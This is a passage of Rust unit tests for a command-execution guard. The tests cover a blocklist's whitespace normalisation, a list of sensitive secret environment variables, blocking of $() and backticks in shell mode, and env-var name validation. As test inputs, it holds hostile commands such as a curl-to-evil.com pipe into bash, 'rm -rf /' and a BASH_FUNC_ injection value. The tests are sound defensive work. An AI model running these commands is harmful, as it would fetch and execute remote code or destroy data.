932            "Double space in sudo should be blocked"
933        );
934    }
935
936    #[test]
937    fn test_blocklist_catches_eval_with_tabs() {
938        assert!(
939            check_blocklist("eval\t$user_input").is_err(),
940            "Tab in eval should be blocked"
941        );
942    }
943
944    #[test]
945    fn test_blocklist_catches_pipe_bash_with_extra_spaces() {
946        assert!(
947            check_blocklist("curl https://evil.com |  bash").is_err(),
948            "Extra spaces around pipe-bash should be blocked"
949        );
950    }
951
952    #[test]
953    fn test_blocklist_catches_chmod_with_tabs() {
954        assert!(
955            check_blocklist("chmod\t777\t/tmp").is_err(),
956            "Tabs in chmod 777 should be blocked"
957        );
958    }
959
960    #[test]
961    fn test_normalize_whitespace_collapses_spaces() {
962        assert_eq!(normalize_for_blocklist("rm  -rf  /"), "rm -rf /");
963    }
964
965    #[test]
966    fn test_normalize_whitespace_converts_tabs() {
967        assert_eq!(normalize_for_blocklist("rm\t-rf\t/"), "rm -rf /");
968    }
969
970    #[test]
971    fn test_normalize_whitespace_trims() {
972        assert_eq!(normalize_for_blocklist("  rm -rf /  "), "rm -rf /");
973    }
974
975    #[test]
976    fn test_normalize_whitespace_mixed() {
977        assert_eq!(normalize_for_blocklist("rm \t -rf \t /"), "rm -rf /");
978    }
979
980    // =========================================================================
981    // Regression: Bug 5 — sensitive_env_vars includes non-provider secrets
982    // =========================================================================
983
984    #[test]
985    fn test_sensitive_env_vars_includes_aws_secret() {
986        let vars = sensitive_env_vars();
987        assert!(
988            vars.contains(&"AWS_SECRET_ACCESS_KEY"),
989            "AWS_SECRET_ACCESS_KEY should be in sensitive list"
990        );
991        assert!(
992            vars.contains(&"AWS_SESSION_TOKEN"),
993            "AWS_SESSION_TOKEN should be in sensitive list"
994        );
995    }
996
997    #[test]
998    fn test_sensitive_env_vars_includes_common_secrets() {
999        let vars = sensitive_env_vars();
1000        assert!(vars.contains(&"DATABASE_URL"));
1001        assert!(vars.contains(&"GITHUB_TOKEN"));
1002        assert!(vars.contains(&"GH_TOKEN"));
1003        assert!(vars.contains(&"STRIPE_SECRET_KEY"));
1004        assert!(vars.contains(&"JWT_SECRET"));
1005        assert!(vars.contains(&"PRIVATE_KEY"));
1006        assert!(vars.contains(&"ENCRYPTION_KEY"));
1007    }
1008
1009    #[test]
1010    fn test_sensitive_env_vars_sorted_and_deduped() {
1011        let vars = sensitive_env_vars();
1012        // Verify sorted
1013        for pair in vars.windows(2) {
1014            assert!(
1015                pair[0] <= pair[1],
1016                "sensitive_env_vars not sorted: '{}' > '{}'",
1017                pair[0],
1018                pair[1]
1019            );
1020        }
1021        // Verify no duplicates
1022        let unique_count = {
1023            let mut v = vars.clone();
1024            v.dedup();
1025            v.len()
1026        };
1027        assert_eq!(
1028            vars.len(),
1029            unique_count,
1030            "sensitive_env_vars has duplicates"
1031        );
1032    }
1033
1034    // =========================================================================
1035    // Regression: Bug 16 — shell-mode blocklist blocks $() and backticks
1036    // =========================================================================
1037
1038    #[test]
1039    fn test_shell_mode_blocklist_blocks_command_substitution() {
1040        let result = check_shell_mode_blocklist("echo $(rm -rf /)");
1041        assert!(result.is_err(), "$() should be blocked in shell mode");
1042        let err = result.unwrap_err();
1043        assert!(err.to_string().contains("NIKA-053"));
1044    }
1045
1046    #[test]
1047    fn test_shell_mode_blocklist_blocks_backtick() {
1048        let result = check_shell_mode_blocklist("echo `whoami`");
1049        assert!(result.is_err(), "backtick should be blocked in shell mode");
1050        let err = result.unwrap_err();
1051        assert!(err.to_string().contains("NIKA-053"));
1052    }
1053
1054    #[test]
1055    fn test_shell_mode_blocklist_allows_safe_commands() {
1056        assert!(check_shell_mode_blocklist("echo hello").is_ok());
1057        assert!(check_shell_mode_blocklist("ls -la | grep foo").is_ok());
1058        assert!(check_shell_mode_blocklist("cat file.txt").is_ok());
1059    }
1060
1061    #[test]
1062    fn test_validate_exec_command_with_shell_blocks_substitution() {
1063        // Shell mode: $() should be blocked
1064        let result = validate_exec_command_with_shell("echo $(rm -rf /)", true);
1065        assert!(result.is_err(), "$() should be blocked in shell mode");
1066
1067        // Non-shell mode: $() is harmless (shlex treats it as literal)
1068        let result = validate_exec_command_with_shell("echo $(rm -rf /)", false);
1069        // Still blocked by the regular blocklist due to "rm -rf /"
1070        assert!(result.is_err());
1071    }
1072
1073    #[test]
1074    fn test_validate_exec_command_with_shell_blocks_backtick_only_in_shell() {
1075        // Shell mode: backtick should be blocked
1076        let result = validate_exec_command_with_shell("echo `whoami`", true);
1077        assert!(result.is_err(), "backtick should be blocked in shell mode");
1078
1079        // Non-shell mode: backtick is harmless
1080        let result = validate_exec_command_with_shell("echo `whoami`", false);
1081        assert!(
1082            result.is_ok(),
1083            "backtick should be allowed in non-shell mode"
1084        );
1085    }
1086
1087    // =========================================================================
1088    // Regression: Bug 19 — env var name validation
1089    // =========================================================================
1090
1091    #[test]
1092    fn test_validate_env_vars_rejects_bash_func_injection() {
1093        let vars = vec![("BASH_FUNC_x%%".to_string(), "() { evil; }".to_string())];
1094        let result = validate_env_vars(&vars);
1095        assert!(
1096            result.is_err(),
1097            "BASH_FUNC_x%% should be rejected as invalid env var name"
1098        );
1099        let err = result.unwrap_err();
1100        assert!(err.to_string().contains("NIKA-053"));
1101    }
1102
1103    #[test]
1104    fn test_validate_env_vars_rejects_special_chars() {
1105        let invalid_names = vec![
1106            "FOO=BAR",     // contains =
1107            "MY{VAR}",     // contains { }
1108            "VAR(NAME)",   // contains ( )
1109            "MY VAR",      // contains space
1110            "123START",    // starts with digit
1111            "",            // empty
1112            "PATH%INJECT", // contains %
1113        ];
1114
1115        for name in invalid_names {
1116            let vars = vec![(name.to_string(), "value".to_string())];
1117            let result = validate_env_vars(&vars);
1118            assert!(
1119                result.is_err(),
1120                "Env var name '{}' should be rejected",
1121                name
1122            );
1123        }
1124    }
1125
1126    #[test]
1127    fn test_validate_env_vars_allows_valid_names() {
1128        let valid_names = vec![
1129            "HOME", "MY_VAR", "_PRIVATE", "node_env", "CC", "A1B2C3", "_", "_123",
1130        ];
1131
1132        for name in valid_names {
1133            let vars = vec![(name.to_string(), "value".to_string())];
1134            let result = validate_env_vars(&vars);
1135            assert!(result.is_ok(), "Env var name '{}' should be allowed", name);
1136        }
1137    }
1138
1139    #[test]
1140    fn test_is_valid_env_var_name() {
1141        assert!(is_valid_env_var_name("HOME"));
1142        assert!(is_valid_env_var_name("_FOO"));
1143        assert!(is_valid_env_var_name("MY_VAR_123"));
1144        assert!(is_valid_env_var_name("_"));
1145
1146        assert!(!is_valid_env_var_name(""));
1147        assert!(!is_valid_env_var_name("123"));
1148        assert!(!is_valid_env_var_name("FOO%BAR"));
1149        assert!(!is_valid_env_var_name("BASH_FUNC_x%%"));
1150        assert!(!is_valid_env_var_name("MY{VAR}"));
1151        assert!(!is_valid_env_var_name("A=B"));
1152    }
1153}